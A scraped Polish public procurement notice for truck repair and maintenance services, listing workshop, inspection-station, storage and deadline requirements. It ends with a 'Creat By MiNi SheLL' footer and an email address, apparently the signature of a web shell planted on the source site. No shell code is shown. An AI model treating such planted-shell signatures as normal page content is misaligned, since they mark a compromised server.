1)Kod CPV : 50.11.40.00 - Usługi w zakresie napraw i konserwacji ciężarówek.
2)Wykonawca winien wykonywać usługi będące przedmiotem zamówienia w terminie nie dłuższym niż 5 dni roboczych od daty przekazania pojazdu.
3)Wykonawca winien dysponować lub będzie dysponował w celu realizacji zamówienia co najmniej jedną :
a) stacją obsługi (warsztatem samochodowym) zlokalizowaną w odległości nie większej niż 10 km od siedziby Zamawiającego,  wyposażoną w:
-stanowisko diagnostyczne do sprawdzania układu hamulcowego, kierowniczego, oświetlenia oraz zawieszenia,
-stanowisko do wykonania diagnostyki komputerowej silnika oraz układu elektronicznego,
-co najmniej 1 kanał obsługowy.
Stacja obsługi (warsztat) winien być otwarty:
-od poniedziałku do piątku w godzinach od 07.00 - 21.00.
b)stacją kontroli pojazdów spełniająca wymagania określone w Rozporządzeniu Ministra Transportu i Budownictwa z 10.02.2006r. w sprawie szczegółowych wymagań w stosunku do stacji przeprowadzających badania techniczne pojazdów (Dz.U.z 2004r., Nr.40, poz. 275 ) w zw. z art. 84a. ust.1 ustawy Prawo o ruchu drogowym (t.j. Dz.U. z 2012r., poz. 1137 ze zm.).
Jeżeli Wykonawca nie posiada w miejscu świadczenia napraw i obsługi pojazdów stacji kontroli pojazdów, winien przedstawić pisemne zobowiązanie innego podmiotu w zakresie świadczenia usług w tym zakresie na rzecz Zamawiającego tj. że Wykonawca dysponuje tymi zasobami w celu należytej realizacji przedmiotowego zamówienia. Stacja przeprowadzająca badania techniczne pojazdów winna być zlokalizowana w odległości nie większej niż 2 km od warsztatu/stacji obsługi Wykonawcy.
4)Zamawiający wymaga aby pojazdy oczekujące na naprawę były przechowywane na terenie:
b)ogrodzonym, o utwardzonej nawierzchni (poprzez utwardzenie należy rozumieć:
  wyasfaltowanie, kostka brukowa wybetonowanie, wysypanie żwirem, tłuczniem, itp.),
b)   strzeżonym całodobowo lub monitorowanym za pomocą kamer z możliwością rejestracji zapisu oraz oświetlonym, gwarantującym nienaruszalność pojazdów dla osób postronnych,
c)   powierzchni umożliwiającej jednoczesne przechowanie min.1 pojazdu.
5)   Wykonawca umożliwi Zamawiającemu wgląd do pomieszczeń w celu weryfikacji ww. wymagań w zakresie wymaganego wyposażenia jakie posiada Wykonawca w miejscu wykonywania usług będących przedmiotem zamówienia. Wykonawca, który uniemożliwi Zamawiającemu zweryfikowanie ww. wymagań naruszy SIWZ i na podstawie art. 89 ust.1 pkt 2) ustawy PZP jego oferta zostanie odrzucona..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com